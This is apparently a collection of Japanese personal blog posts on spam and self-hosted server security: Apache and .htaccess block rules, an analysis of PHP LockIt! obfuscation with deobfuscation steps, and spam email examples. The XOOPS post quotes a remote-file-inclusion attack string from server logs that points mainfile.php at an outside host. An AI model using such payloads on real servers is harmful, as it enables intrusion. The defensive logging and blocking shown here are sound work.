カテゴリー
everyday life

invite+~@facebookmからのメール。

 つい先日,携帯(SH906i)に迷惑メールがやってきた。私の携帯に迷惑メールなんて,何年ぶりのことだろうか。「どっからだよ」と思って開いてみた。PCのHTML形式のメールの場合,これさえも危ないことがあるのかもしれないが,ガラケーのテキストメールの場合は,そこまでの話は聞いたことがないので,開けちゃった(汗)。

 で,こんなやつです。

To: 携帯のメールアドレス
Date: 13/02/xx 20:05
From: invite+~@facebookm
 (注)~の部分には,長々と自動生成らしき文字列が入っている。
Subject: Facebookで○○さんの写真をチェック
 (注)○○は実在の知人の名前。しかし,ものすごく長くあっていないし,そこまで親しくない。
添付: [添付ファイル削除]
本文: Facebookで○○さんの写真をチェック

Facebookに登録すると、友達の写真や動画や近況を見たり、メッセージを交換したり、さまざまな形で友達とつながることができます。

Facebookで○○さんと交流しましょう
http://www.facebook.com/p.php?i=nnnnnnnnnnnnnnn&k=xxxxxxxxxxxxxxxxxxxxxxx_xxxxxxxxxxx-xxxxxxxxxxxxxxxxxxxxxxxxx_xxxxxxxxxxxxxxxxxxxxxxxxxxxx&r&app_id=nnnnnnnnnn

すでにアカウントをお持ちの場合は、このメールアドレスを追加してください。
http://www.facebook.com/merge_accounts.php?e=私の携帯メールアドレス&c=xxxxxxx_xxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxx_qRt2Q&source=unknown

=======================================
このメッセージは(私の携帯メールアドレス)宛てに送信されました。 今後Facebookからこのようなメッセージを受けとりたくない場合、またはメールアドレスを友達の紹介に使用したくない場合は、購読を停止するには以下のリンクをクリックすることができます。
http://www.facebook.com/o.php?k=xxxxxxxxxxxxxxxx&e=私の携帯メールアドレス&mid=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA 94303

 facebookmというドメインを見たことがなかったので,「スワッ,なりすましか」って思ったのだが,どうやら,
facebookmail.comのモバイル版ドメインのようだ。だから,なりすましではないわけだが,
facebookmail.com同様,モバイルでもお邪魔虫なのねー。まったく,facebookのポリシーって,日本人には(いえ,私だけかも知れませんが―汗)理解しがたいよ。

 自分が,迷惑メールの発信元にならないように,facebookの設定を見直しとこうね。例えば,アカウント設定とか,プライバシー設定とか。<<--- 誰に言ってんだよ。自分にだろ(爆)。 facebook それに,今回調べてみて知ったんだが,「もっと友達を探そう」なんていうところをクリックしたときに赤丸のところをチェックしたままだと,招待のメールが送られるが,設定によっては,「招待とインポートした連絡先を管理」に入っているメンバーにも勝手に送られるらしい。未確認だけど。

 で,「招待とインポートした連絡先を管理」の情報って,今回見てみたら,Yahooでメールをやり取りしただけの相手のものまで入っていた。
 Yahooで友人を探してみたのは,参加したころ(2011年1月)に試しただけなので,そのときのYahooの受信箱に入っていた情報だと思う。私の場合,Yahooのアドレス帳は空なので,これの中のものでないことははっきりしている。この辺は,ネット上で読んだこととは違うようだ。
 というわけで,「インポートした連絡先をすべて削除」しておいた。幸いにして自分の設定がキチキチだったので,誰にも迷惑メールは送られていなかったようだ。ホッ。

 で,今回携帯にやってきたメールは,おそらく相手が携帯(あるいはスマホか)上で,右上画像類似のところをタップしたのだと思う。しかし,相手は携帯でしかメールのやり取りをしたことのない相手だよ。ということは,差出人の携帯アドレス帳にメールアドレスのあった全員宛に,これが送られたんじゃないだろうかと勘繰っちゃうね(未確認だから,あくまで,憶測ですよ。どんな操作をしたのかなんて確認するほど,親しい相手ではないので)。キャリアのトラフィック的にも,立派に迷惑メールだ。人によってだが,携帯なんて,どのくらいアドレスが入ってるか分かったもんじゃない。
 私の憶測が正しい場合に限っての話だけど,営業の方とか,ついうっかり,仕事用の携帯でやっちゃいけない私用のfacebookアクセスして,「問題のリンクをタップ」とかしたら,最悪だねぇ。

 さて,メールの購読中止を使うのは,別の問題がある気がするので,facebookmは受信拒否ドメインにした。我が家的には,解決!!!

追記:
 シバケンさんから早速のコメントをいただきました。結構,みなさん経験があるんですね。しかし,
> 今回携帯にやってきたメールは,おそらく相手が携帯(あるいはスマホか)上で,右上画像類似のところを
> タップしたのだと思う。
と書いたように,先方に確認したわけではない未確認の憶測ですので,くれぐれも頭から信じないように(爆)& m(_”_)m。

カテゴリー
WordPress

今更ながらのアクセス制限。

投稿アップデート情報  追記(2/22)  追記2(4/16)

 ほんと,今更ながらなんですが, wp-login.php にアクセス制限をかけました。なんのためかというと, AWStats の統計から外すためです。

 この件については,ずっと,ほったらかしだったんです。というのが,不正アクセスされてるみたいだなという程度で,数もそれほどでなく,特に問題はないようだったもんで。それに,WordPressのフォーラムを見ても,常に最新版を使うようにし,強いパスワードを使っていれば,うちのようなサーバの使い方(使用者は,私だけ)であれば,そこまでする必要もないだろうと感じていたものですから。
 そんなわけで,ときどきパスワードを変えたりでお茶を濁していたのですが,年末から, wp-login.php への不正アクセスがドッと増えちゃって。どうも,英語版の「ブログに雪が降る。」を書いてからのような気がします。先年,大震災についての記事を英語版で書いたときも,ドッとスパムが増えたような覚えがありますが,英語版でタイムリーなトピックを取り上げたときは,そういうほうでも反応が早いみたいで,いい迷惑です……

 なにしろ,ログイン画面が表示された時点で,HTTPステータスコード 200 が戻るもんで,これのアクセス数がすべて AWStats の統計に入ってきちゃって,参った参ったというところです。で,このさい, access-denied.conf という extra-conf を作り apache に読み込ませることにしました。
 ついでに,主な迷惑サイト(主として,*.163data.com.cn―苦笑)のアクセス制限もこっちに移しました。

 access-denied.conf の中身は,下記のようなものです。 G:/WEB というのは,ドキュメントルートです。ディレクティブは新しいほうの形で書いてみました(笑)。
 wp-login.php のアクセス制限をどんな形にしようかと思ったのですが,当面,自宅からだけ認める形にしました。さっき設定したばかりなんですが,error.log に,[authz_core:error] がすでに 10 個ばかり並んでますから,効果大ですねぇ。これで AWStats の統計から wp-login.php への不正アクセスが外せます。やれやれ。

<Files “wp-login.php”>
Require ip xxx.xxx.xxx.xxx/xx  <<--- 自宅LANのIPアドレス </Files> <Directory "G:/WEB"> <RequireAll> Require all granted # [*.163data.com.cn] # [110.80.0.0 - 110.91.255.255] Require not ip 110.80.0.0/12 # [112.112.0.0 - 112.115.255.255] Require not ip 112.112.0.0/14 # [116.52.0.0 - 116.55.255.255] Require not ip 116.52.0.0/14 # [117.24.0.0 - 117.31.255.255] Require not ip 117.24.0.0/13 # [117.60.0.0 - 117.63.255.255] Require not ip 117.60.0.0/14 # [117.80.0.0 - 117.95.255.255] Require not ip 117.80.0.0/12 # [119.96.0.0 - 119.103.255.255] Require not ip 119.96.0.0/13 # [120.32.0.0 - 120.43.255.255] Require not ip 120.32.0.0/12 # [121.204.0.0 - 121.207.255.255] Require not ip 121.204.0.0/14 # [121.224.0.0 - 121.239.255.255] Require not ip 121.224.0.0/12 # [121.32.0.0 - 121.35.255.255] Require not ip 121.32.0.0/14 # [123.184.0.0 - 123.187.255.255] Require not ip 123.184.0.0/14 # [123.52.0.0 - 123.55.255.255] Require not ip 123.52.0.0/14 # [124.72.0.0 - 124.72.255.255] Require not ip 124.72.0.0/16 # [124.76.0.0 - 124.79.255.255] Require not ip 124.76.0.0/14 # [125.112.0.0 - 125.112.127.255] Require not ip 125.112.0.0/17 # [125.77.0.0 - 125.78.255.255] Require not ip 125.77.0.0/14 # [125.88.0.0 - 125.95.255.255] Require not ip 125.88.0.0/13 # [218.78.0.0 - 218.83.255.255] Require not ip 218.78.0.0/11 # [218.85.0.0 - 218.86.127.255] Require not ip 218.85.0.0/14 # [219.128.0.0 - 219.137.255.255] Require not ip 219.128.0.0/12 # [220.160.0.0 - 220.162.255.255] Require not ip 220.160.0.0/14 # [220.185.192.0 - 220.185.255.255] Require not ip 220.185.192.0/18 # [220.191.0.0 - 220.191.127.255] Require not ip 220.191.0.0/17 # [221.236.0.0 - 221.237.255.255] Require not ip 221.236.0.0/15 # [222.170.0.0 - 222.172.127.255] Require not ip 222.170.0.0/13 # [222.208.0.0 - 222.215.255.255] Require not ip 222.208.0.0/13 # [222.76.0.0 - 222.79.255.255] Require not ip 222.76.0.0/14 # [27.148.0.0 - 27.151.255.255] Require not ip 27.148.0.0/14 # [58.37.0.0 - 58.37.255.255] Require not ip 58.37.0.0/16 # [58.48.0.0 - 58.55.255.255] Require not ip 58.48.0.0/13 # [58.60.0.0 - 58.63.255.255] Require not ip 58.60.0.0/14 # [59.32.0.0 - 59.42.255.255] Require not ip 59.32.0.0/12 # [59.52.0.0 - 59.61.255.255] Require not ip 59.52.0.0/12 # [60.176.0.0 - 60.176.255.255] Require not ip 60.176.0.0/16 # [60.188.128.0 - 60.188.255.255] Require not ip 60.188.128.0/17 # [61.140.0.0 - 61.146.255.255] Require not ip 61.140.0.0/11 # [61.154.0.0 - 61.154.255.255] Require not ip 61.154.0.0/16 # [61.169.0.0 - 61.173.255.255] Require not ip 61.169.0.0/13 </RequireAll> </Directory> 追記(2/22):  題名のせいか,wp-login.phpのせいか,WordPressのセキュリティ強化の記事として読みに来る方が結構いらっしゃるようなので,現時点で参考になりそうなサイトを3つあげておきます。まあ,セキュリティ関係はナマモノなので,あくまで現時点の話です。上げられてる10個のうちの半分は,WordPressに限る話ではないですよね。up-to-dateとか,パスワード強度とか,ユーザの啓蒙とか。最後のものなんて一番苦労するとこじゃないですか。  記事は番号順にお読みください。

  1. WordPress のセキュリティ、こんな記事は要注意
  2. WordPress使いならこれだけはやっておきたい本当のセキュリティ対策10項目
  3. Re: WordPress使いならこれだけはやっておきたい本当のセキュリティ対策10項目

追記2(4/16):
 以下のようなニュースがあった。対策していない場合は,やった方がいい。なにしろ,うちのような零細ブログでも,wp-login.phpへの不正アタック数は,1日平均
     2012/11 — 99   2012/12 — 370   2013/01 — 290
     2013/02 — 320   2013/03 — 117   2013/04 — 377 15日終了時点
なんて感じだから,何も対策ができていない場合は,結構,破られる可能性はあると思うよ。しかし,本当に,12月にブログに雪が降るの話を書くまでは,アタック数少なかった気がするんだけどなあ。

  1. 全世界のWordPressサイトに大規模攻撃; デフォルトのアドミンユーザ名’admin’がねらわれている
  2. Brute Force Attacks Build WordPress Botnet
  3. WordPressを狙った大規模な攻撃

 とりあえず, 管理者ユーザ名を「admin」から他の何かに変更するとか,強いパスワードを使うとかいう対策が推奨されているようだが,先日の「2013年4月マイクロソフト定例。」あたりにも出てきた話だけど,パスワードの使いまわしとかはやめた方がいい。

カテゴリー
everyday life

SpyEye(スパイアイ)の話。

 11月に入ってから,取引先の銀行からこんなのやこんなのが来ていた。どちらも似たような内容だ。

 こういうものは珍しくないがと思っていたら,今朝,朝日にこんな記事が載っていた。

 特に,後半についてさもありなんと思った。まあ,私自身,プラグインの日本語化ファイルを作ったりしていて,それが簡単に作れることに感動しているわけで,そういうものを悪用する人間も当然現れるだろうということだ。

 便利になっていいことが増えれば,それを利用して悪いことをする人間も増えるわけで,いっそう気をつけなければいけないということだ。スパイアイ対策については,ちょっと古い記事だけれども,いつもながらSo-netの記事をリンクさせておいてもらおうと思う。

カテゴリー
everyday life

LockIt!を悪用したPHPのMal-script.

投稿アップデート情報  追記2(2017/1/24)

 発端はまたまたScottなんだが,プラグインの初レビューをもらったとかつぶやいていた。Twitterの日付は12日になっているけど,お盆で忙しかったし,読んだのは15日くらい。で,そのページを見に行ったら, WPFMP を褒めてるのは勿論として,その前ふりにハッカーのことをぶつぶつ書いている。早い話が,それに手を焼いてWPFMPを導入という話なわけ。

 その文章にハッカーが置いていったファイルの中に「This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.」ってのを見つけたと書いてあった。笑っちゃったよ。だって,よそさんに悪いことしに入って,警察に行っちゃだめよとか,書くのに似てるジャン。で,よくあるのかなぁとこの英文(ダブルクォートで括ってだよ)でググってみたら,なんと10000以上あった。でも,日本語だけにしてみたら,全く引っかからなくなった。それで,関連のところを見ていくと,どれを見ても$OOO000000=urldecode(‘%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64’)というのが,入っている。そうすると,次は,これはなんだとなるのが,自然というもの。

 今度は,これでググってみた。大分数は減ったけど,2000ばかりある。日本語だけにしてみたら,たった1個だけ残った。これには,初めのキーワードにした英文は入っていなかった。日本語の制限を外して見てみると,最初の英文は入っているのやら入っていないのやらいろいろある。

 調べていってわかったんだけど,「PHP LockIt!」というアプリがあって,これを使うと,今回調べたようなものができるらしい。米ドルで29.99とか書いてある。PHP Scriptを暗号化するアプリらしい。

 デモ版を落とし,hello.phpを作って暗号化してみた。もとのhello.phpの中身はよくあるこんなの。
     <?php
     $hello = ‘Hello world!’;
     echo $hello;
     ?>
 これが,次のようなのに化ける。ページの都合上改行を入れているが,実際は,長い長い1行になる。

<?php /* This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */$OOO000000=urldecode(‘%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64’);
$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.
=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO00
00O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$
OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000
O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O00
0O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO00000
0{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO0
00000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=
__FILE__;$OO00O0000=0x48;
eval($OOO0000O0(‘JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTz
AwT08wMCgkTzAwME8wTzAwLDB4NGY3KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMD
AwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQ
mJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUp
LTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nK
Sk7ZXZhbCgkT08wME8wME8wKTs=’));return;?>
~Dkr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLT
09NHeEXHr8XhtONT08XHeEXHr8Pkr8XTzEXT08XHtILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfy
dmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW
1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3
O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXT
zEpKX==tJOkUAlkUAlkUAlkUALINUEmUoaSdo8If29ZdoWikzShcBYPdZELUAlkUAlkUAlkUAlk
KXP7alVnRPIq

 もとは,47バイトだったものが,1,731バイトになる。へえっと,思ったんだが,調べている途中でわかったことによると「PHP LockIt!」って評判よくないんだな。誰にでもすぐにデコードできるとか書いてある。暗号化したものが,誰にでもすぐに復号できるようじゃお金を払う意味がないよね。でもって,誰にでもっていうのがどの程度なのか,試してみたくなるのは人情でしょ。

 最初にキーワードにした英文には,デコードしてはいけませんと書いてあるけど,ハッカーにさえ利用されているくらいだから,どのくらい役に立つものか確認のためにやってみてからじゃないと,購入もできないじゃん。というわけで,ネットの記事を手掛かりにデコードをやってみた。ネット上には,はっきり書いたところはなかった。やはり,営業妨害とかにあたる恐れがあるんだろう。まぁ,私の検索の腕が悪かっただけという落ちもあるが。

 しかし,それだけあやふやな手がかりしかなかったにもかかわらず,大してPHPにも暗号にも詳しくない私にデコードできてしまった。これは,まずいよ。

 というわけで,よそ様の営業の妨害をするつもりはないけど,ハッカーには利用されるは大して知識のない私にでもデコードはできるはと,「PHP LockIt!」は踏んだり蹴ったりだということになってしまった(溜息)。

追記:
 早速の追記。単純に「PHP LockIt!」をやっただけの状態では,暗号化(encrypted)とは言わないらしい。難読化(obfuscated)という呼び方をするようだ。読みにくくするということでは,意味があるね。簡単には読めなくなるのは確かだ。

追記(8/25):
 「$OOO0000O0 デコード」などの検索ワードでここに来る方がいるので,やはりマルスクリプトは流行っているのだと思う。日本語サイトでは,今のところうちしか引っかからないようだから,営業妨害にならない程度でデコードの手順を書いておこうかな。自サイトに読めないファイルが勝手に置かれていたら,何をやられているのか知る必要があるだろうから。
 【注意】自サーバ上に自分の知らないphpファイルがあってこれについて調べるわけだから,これを不用意にオンラインで実行してはいけない。該当ファイルはダウンロードし,ローカルにPHPをインストールしてオフラインでテストを行なうのがいいと思う。さらに言えば,ローカルかつオフラインであまり悪さをするscriptはない(大体の目的がオンラインでのデータ飛ばしとかみたいなので)と思うが,メイン機で試すのは避けるべきだろう。

  1. urldecode(‘%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64′);がどんな文字列か確認。→’fg6sbehpra4co_tnd’
  2. これをキーに,$OOO000000{4}や$OOO000000{14}などをアルファベットに直す。→$OOO000000{4}はb,$OOO000000{14}はt  これで,元ファイルの初めの部分が,PHPのファンクションに直せる。直したものは,別ファイルにしておく(1)。
  3. 元ファイルには,難読化したものを元に戻す部分と実際の実行部分が含まれているわけだが,元に戻す部分を別ファイルのしてやるとうまくいく。まず,元ファイルのevalをechoに変えて,()内の文字列をPHPコードとして評価・実行する代わりに出力してやる。
    $O000O0O00=$OOO000O00($OOO0O0O00,’rb’);~eval($OO00O00O0); が得られる。
  4. これを先ほどの(1)の情報を使ってデコードしてやる。2種の変数名関連が,$O000O0O00なんちゃらで残るので,日頃使い慣れている変数名に直す。ここで出てきたevalもechoにしておく。
    デコードしたものをphpにして走らせるわけだが,このときの注意は__FILE__を元ファイル名に直すこと。元々一つのものを2つにしているわけだから,これを直し忘れるとうまくいかない。
  5. 出力結果として,$OO00O00O0=str_replace~eval($OO00O00O0);が得られる。これも同じように,デコードしてphpにして走らせる。ここのevalもechoにする。__FILE__を元ファイル名に直すことと,ここまでに出てきた複数のfreadの扱いに気をつければ,うまくいく。

追記(8/28):
 デコードしたときにscope となる場合があるが,ecodeと読みかえれば,O.K.

追記2(2017/1/24):
 WordPress File Monitor Plus(WPFMP) は開発終了の模様。 Fork として WordPress File Monitor があるのでそちらを使うといいと思う。

カテゴリー
everyday life

*.163data.com.cnというホスト。

投稿アップデート情報  追記(2014.4.20)

 日々,サーバの管理をしているといろいろな不正アクセスがある。その中で最近よく表れるのが,表題のホスト名である。ググってみると,結構前から悪評判がある。

 サーバのアクセス解析を真面目に始めたのは2009年の12月からだが,去年もこのホストのアクセスが何度かあった。しかし,不正アクセスとして目くじら立てるほどのものでもなく,ピンポイントで該当IPアドレスのアクセス拒否をしておいた。3月に震災の記事を書いた後からだと思うのだが,このホストからのアクセスが急に増えた。前と同様に,IPアドレスでのピンポイント拒否をしてきたのだが,IPアドレスがチョクチョク変わる。しかも,今のところこのホストのアクセスがすべて不正アクセス。こうなると,ピンポイントのアクセス拒否も面倒なので,この際,過去にさかのぼって,ネットマスクを使ってアクセス拒否をすることにした。もしかしたら,巻き添えが発生するかもしれない……それが,少し,気がかりといえば気がかり。

 アクセス拒否しようと思うアドレスは以下の通り。
       59.56.0.0/13
       117.24.0.0/13
       117.80.0.0/12
       120.32.0.0/13
       120.40.0.0/14
       121.32.0.0/14
       121.204.0.0/14
       121.224.0.0/12
       125.77.0.0/16
       220.160.0.0/14
       222.76.0.0/14

追記(2014.4.20):
 現時点のリスト。上の分も含まれたままだが,増えた。太字斜字体が今回追加分。
       110.80.0.0/12
       112.112.0.0/14
       116.52.0.0/14
       117.24.0.0/13
       117.60.0.0/14
       117.80.0.0/12
       119.96.0.0/13
       120.32.0.0/12
       121.204.0.0/14
       121.224.0.0/12
       121.32.0.0/14
       123.184.0.0/14
       123.52.0.0/14
       124.72.0.0/16
       124.76.0.0/14
       125.112.0.0/17
       125.77.0.0/14
       125.88.0.0/13
       218.78.0.0/11
       218.85.0.0/14
       219.128.0.0/12
       220.160.0.0/14
       220.185.192.0/18
       220.191.0.0/17
       221.236.0.0/15
       222.170.0.0/13
       222.208.0.0/13
       222.76.0.0/14
       27.148.0.0/14
       58.37.0.0/16
       58.48.0.0/13
       58.60.0.0/14
       59.32.0.0/12
       59.52.0.0/12
       60.176.0.0/16
       60.180.0.0/16
       60.188.128.0/17
       61.140.0.0/11
       61.154.0.0/16
       61.169.0.0/13

カテゴリー
everyday life

気を付けよう,スパム請求書。

 昨日,右画像のようなメールを受け取った。伏字にしてあるところは,WhoIsなどで調べれば誰でも入手可能な私のドメイン情報なんだが,まぁ,見るからに怪しいメールだね。差出人のドメイン名italiandesignerbrands.comでググってみたら,いろいろある。SPAM Bills?(魚拓です)とか,italiandesignerbrands.com – Italian Designer Brandsとか。特に,2つ目のDomainToolsの記載は実に興味深い。
 実際のメールでの,SECURE ONLINE PAYMENTのリンク先は「http://registrationdom.com/order/BoSgRQMWamy7EfIZaoK4LA%3D%3D」,また,画像では切れてしまっているが下にはClick here to unsubscribeがあって,これのリンク先は「http://registrationdom.com/unsubscribe/RKmgXMd2HqG7EfIZaoK4LA%3D%3D」となっている。このregistrationdom.comでぐぐると日本語の情報があった。サーチエンジン・レジストレーション?詐欺?というのだ。
 ところで,このメール見るからに怪しいと思うんだが,払っちゃう人とかいるんだろうか。まぁ,払う操作をしでかすとこまでいかなくても,リンクをクリックするとその先で,Keyloggerとか,Password Stealerなんぞに遭遇するってことはあるかもしれないねぇ。

カテゴリー
XOOPS

mainfile.php狙いの不正アクセス。

 今日は,寒かった。昨日から南に見える例のお山は雪を頂いていたが,今朝は北に見える山も雪を被っていた。初雪である。まぁ,家の辺まで降ったわけではありませんが……

 ところで,12月5日にXOOPSを導入して以来,mainfile.php狙いの不正アクセスがApacheのログに多く記録されている。
mainfile.php?MAIN_PATH=http://www.all3c.com///images/mono/20100907/app/functions/response.txt?
mainfile.php?id
なんちゃらで,libwww-perlを利用したものである。自鯖にはmainfile.phpはないので,すべて404エラーになっている。@PAGESのほうではまだアクセスログを見ていないので分からないが,やっぱりmainfile.phpは有名な名前なんだね。

 MoovableTypeでも,WordPressでもコンフィグを狙うアクセスは多いけど,有名どころのアプリをそのままの名で設置するときは,指示されているセキュリティ関係のオプションはきっちりやらないと危ないよ。
Trojan-Spy.PHP.Mailar.h
 ところで,aguse.jp越えで h ttp://www.all3c.com///images/mono/20100907/app/functions/response.txt? にアクセスしたら,右の画像が表示された。カスペルスキー,えらい。

カテゴリー
WordPress

フィードについて。

 唐突だが,WordPressを使っているこのブログのフィードには以下の4通りのURLで直接アクセスできる。もちろん右下のほうのリンクをクリックしてもよい。
/BLOG-J/?feed=rss
/BLOG-J/?feed=rss2
/BLOG-J/?feed=rdf
/BLOG-J/?feed=atom

 本家のほうのフィードには以下のURLが使える。こちらのほうも左のサイドバーのリンクをクリックしてもよい。
/BLOG/atom.xml

 ところで,自分がフィードを使うときは,FireFoxでなのだが,昨日,IE8でフィードを見て驚いた。表示形式が全然違う。画像まで出ている。(驚)
 なんで,IE8を使ったかといえば,コメントで「I cannot access your rss feed… Something trouble?」というのがあったので,えーっと思って職場から試してみたのだ。(仕事中に悪い子です。―笑)

 このコメント,結局スパムのようだったが,ブラウザによるフィードの表示の違いを学習させてくれたので,グッド・スパムとしておこう。(笑)

カテゴリー
WordPress

アクセス制限。

先日,梅の実(今日の落下分)で書いたように,ブログページへのbotがあまりに激しいので,共通するユーザーエージェントで制限して見ようと思って,.htaccessに以下を追加して見た。

SetEnvIf User-Agent “libwww-perl” ng_ua
Order allow,deny
Allow from all
Deny from env=ng_ua

効果あるだろか。

追記:
先日,Casper_Cell Parijatah sronoをググッたときはあまり情報がなかったんだけど,今日.htaccessを変更してから,libwww-perlで調べたら,かなり前から報告のあるphpライブラリの悪用方法のようですね。「変更前に調べろよ」と,突っ込まれそうですが,サーバ初心者なので……(苦笑)
http://gigazine.net/index.php?/news/comments/20070410_libwww/
http://www.hazama.nu/t2o2/archives/002711.shtml
本当は,マルスクリプト内の用語で弾くべきなんだろうけど,それはもう少し勉強してからにします。今のところ,ユーザーエージェントで’libwww-perl’を名乗ってるのはスパムばかりなので,前記の.htaccessで大丈夫そうです。